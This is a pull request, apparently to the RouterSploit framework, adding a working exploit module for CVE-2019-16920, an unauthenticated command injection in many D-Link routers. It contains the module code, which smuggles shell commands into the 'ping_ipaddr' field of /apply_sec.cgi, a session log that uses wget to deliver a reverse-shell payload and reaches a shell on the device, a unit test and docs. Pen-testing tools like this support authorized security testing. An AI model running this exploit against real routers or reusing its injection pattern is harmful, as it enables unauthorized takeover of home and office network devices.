### PR TITLE
Add new exploit for D-Link from CVE-2019-16920

### DIFF
--- a/docs/modules/exploits/routers/dlink/dir_655_866_652_rce.md
+++ b/docs/modules/exploits/routers/dlink/dir_655_866_652_rce.md
@@ -1,0 +1,79 @@
+## Description
+
+Module exploits unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565.
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use exploits/routers/dlink/dir_655_866_652_rce`
+  3. Do: `set target [TargetIP]`
+  4. Do: `run`
+  5. If router is vulnerable, it should be possible to execute commands on operating system level.
+  
+  6. Do: `set payload reverse_tcp`
+  7. Do: `set lhost [AttackerIP]`
+  8. Do: `run`
+  9. Payload is sent to device and executed providing attacker with the command shell.
+
+## Scenarios
+
+```
+rsf > use exploits/routers/dlink/dir_655_866_652_rce
+rsf (D-Link PingTest RCE) > set target 192.168.1.1
+[+] target => 192.168.1.1
+rsf (D-Link PingTest RCE) > run
+[*] Running module exploits/routers/dlink/dir_655_866_652_rce...
+[+] Target is vulnerable
+[*] Invoking command loop...
+[*] It is blind command injection, response is not available
+
+[+] Welcome to cmd. Commands are sent to the target via the execute method.
+[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
+
+cmd > show payloads
+[*] Available payloads:
+
+   Payload         Name                   Description
+   -------         ----                   -----------
+   bind_tcp        MIPSLE Bind TCP        Creates interactive tcp bind shell for MIPSLE architecture.
+   reverse_tcp     MIPSLE Reverse TCP     Creates interactive tcp reverse shell for MIPSLE architecture.
+
+cmd > set payload reverse_tcp
+cmd (MIPSLE Reverse TCP) > show options
+
+Payload Options:
+
+   Name      Current settings     Description
+   ----      ----------------     -----------
+   lhost                          Connect-back IP address
+   lport     5555                 Connect-back TCP Port
+
+
+cmd (MIPSLE Reverse TCP) > set lhost 192.168.1.4
+lhost => 192.168.1.4
+cmd (MIPSLE Reverse TCP) > run
+[*] Using wget method
+[*] Using wget to download binary
+[*] Executing payload on the device
+[*] Waiting for reverse shell...
+[*] Connection from 192.168.1.1:41933
+[+] Enjoy your shell
+ls -la
+drwxrwxrwx   15 admin    root           224 Mar 11  2013 .
+drwxrwxrwx   15 admin    root           224 Mar 11  2013 ..
+drwxr-xr-x    2 admin    root          2554 Mar 11  2013 bin
+drwxr-xr-x    2 admin    root             3 Mar 11  2013 data
+drwxr-xr-x    4 admin    root          2482 Mar 11  2013 dev
+drwxr-xr-x   12 admin    root           779 Mar 11  2013 etc
+drwxr-xr-x    6 admin    root           690 Mar 11  2013 lib
+lrwxrwxrwx    1 admin    root            11 Mar 11  2013 linuxrc -> bin/busybox
+drwxr-xr-x    2 admin    root             0 Jan  1  1970 mnt
+drwxr-xr-x    5 admin    root            56 Mar 11  2013 opt
+dr-xr-xr-x   69 admin    root             0 Jan  1  1970 proc
+drwxr-xr-x    2 admin    root           270 Mar 11  2013 sbin
+drwxr-xr-x   11 admin    root             0 Jan  1  1970 sys
+lrwxrwxrwx    1 admin    root             8 Mar 11  2013 tmp -> /var/tmp
+drwxr-xr-x    4 admin    root            38 Mar 11  2013 usr
+drwxr-xr-x   16 admin    root             0 Oct 19 20:36 var
+drwxr-xr-x    5 admin    root          2801 Mar 11  2013 webs
+```

--- a/routersploit/modules/exploits/routers/dlink/dir_655_866_652_rce.py
+++ b/routersploit/modules/exploits/routers/dlink/dir_655_866_652_rce.py
@@ -1,0 +1,84 @@
+from routersploit.core.exploit import *
+from routersploit.core.http.http_client import HTTPClient
+
+
+class Exploit(HTTPClient):
+    __info__ = {
+        "name": "D-Link PingTest RCE",
+        "description": "Module exploits unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. "
+                       "The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to common injection. "
+                       "An attacker who successfully triggers the command injection could achieve full system compromise. "
+                       "Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.",
+        "authors": (
+            "FortiGuard Labs",  # vulnerability discovery and metasploit module
+            "GH0st3rs",  # routersploit module
+        ),
+        "references": (
+            "https://nvd.nist.gov/vuln/detail/CVE-2019-16920",
+            "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124",
+            "https://www.fortinet.com/blog/threat-research/d-link-routers-found-vulnerable-rce.html",
+            "http://kb.cert.org/artifacts/cve-2019-16920.html",
+        ),
+        "devices": (
+            "DAP-1533 < v1.02B",
+            "DGL-5500 < v1.13b04",
+            "DIR-130 < v1.23b20",
+            "DIR-330 < v1.23b18",
+            "DIR-615 < v9.04NAb02",
+            "DIR-655 < v3.02b05",
+            "DIR-825 < v3.02",
+            "DIR-835 < v104b02Beta01",
+            "DIR-855L < v1.03b01",
+            "DIR-866L < v1.03b04",
+            "DHP-1565 < v1.01",
+            "DIR-652 < v2.00B40",
+            "DIR-862 < v1.02",
+        ),
+    }
+
+    target = OptIP("", "Target IPv4 or IPv6 address")
+    port = OptPort(80, "Target HTTP port")
+
+    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
+            print_status("Invoking command loop...")
+            print_status("It is blind command injection, response is not available")
+            shell(self, architecture="mipsle", method="echo", location="/var/tmp/")
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    def execute(self, cmd):
+        headers = {
+            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+            "Cookie": "uid=1234123",
+            "Referer": "http://{}:{}/login_pic.asp".format(self.target, self.port),
+        }
+        data = {
+            "html_response_page": "login_pic.asp",
+            "action": "ping_test",
+            "ping_ipaddr": "127.0.0.1%0a{}".format(cmd)
+        }
+
+        response = self.http_request(
+            method="POST",
+            path="/apply_sec.cgi",
+            headers=headers,
+            data=data
+        )
+        if response is None:
+            return ""
+
+        return response.text.strip()
+
+    @mute
+    def check(self):
+        mark = utils.random_text(32)
+        cmd = "echo {}".format(mark)
+
+        response = self.execute(cmd)
+
+        if mark in response:
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable

--- a/tests/exploits/routers/dlink/test_dir_655_866_652_rce.py
+++ b/tests/exploits/routers/dlink/test_dir_655_866_652_rce.py
@@ -1,0 +1,28 @@
+from unittest import mock
+from flask import request
+from routersploit.modules.exploits.routers.dlink.dir_655_866_652_rce import Exploit
+
+
+def apply_response(*args, **kwargs):
+    data = "TEST" + request.form['ping_ipaddr'] + "TEST"
+    print(request.form['ping_ipaddr'])
+    return data, 200
+
+
+@mock.patch("routersploit.modules.exploits.routers.dlink.dir_655_866_652_rce.shell")
+def test_check_success(mocked_shell, target):
+    """ Test scenario - successful check """
+
+    route_mock = target.get_route_mock("/apply_sec.cgi", methods=["POST"])
+    route_mock.side_effect = apply_response
+
+    exploit = Exploit()
+
+    assert exploit.target == ""
+    assert exploit.port == 80
+
+    exploit.target = target.host
+    exploit.port = target.port
+
+    assert exploit.check()
+    assert exploit.run() is None


### PR DESCRIPTION
## Status
**READY**

## Description

Module exploits unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565.

## Verification Steps

  1. Start `./rsf.py`
  2. Do: `use exploits/routers/dlink/dir_655_866_652_rce`
  3. Do: `set target [TargetIP]`
  4. Do: `run`
  5. ...
## Checklist
- [x] Write module/feature 
- [x] Write tests
- [x] Document how it works
